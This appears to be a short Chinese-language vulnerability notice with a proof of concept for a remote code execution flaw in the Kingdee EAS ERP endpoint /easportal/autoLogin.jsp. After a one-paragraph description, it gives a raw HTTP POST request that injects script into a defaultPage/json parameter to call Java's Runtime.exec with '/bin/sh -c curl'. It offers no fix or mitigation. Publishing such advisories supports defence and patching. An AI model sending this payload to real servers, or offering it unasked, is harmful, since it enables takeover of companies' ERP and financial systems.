漏洞描述
金蝶EAS是一款企业级应用系统,主要用于企业资源计划(ERP)管理。该漏洞存在于/easportal/autoLogin.jsp路径中,攻击者可以通过构造恶意HTTP请求触发代码执行,进而完全控制服务器。该漏洞影响范围广泛,可能涉及企业财务、ERP等关键系统,若公网暴露且未修复,可能对企业业务系统造成严重威胁。
金蝶EAS /easportal/autoLogin.jsp 代码执行漏洞
PoC代码
POST /easportal/autoLogin.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 312
Connection: keep-alive
defaultPage=/autoLogin.jsp?defaultPage=/BIReport&json=1);var cc=new Array('/bin/sh', '-c', 'curl ');java.lang.Runtime.getRuntime().exec(cc);//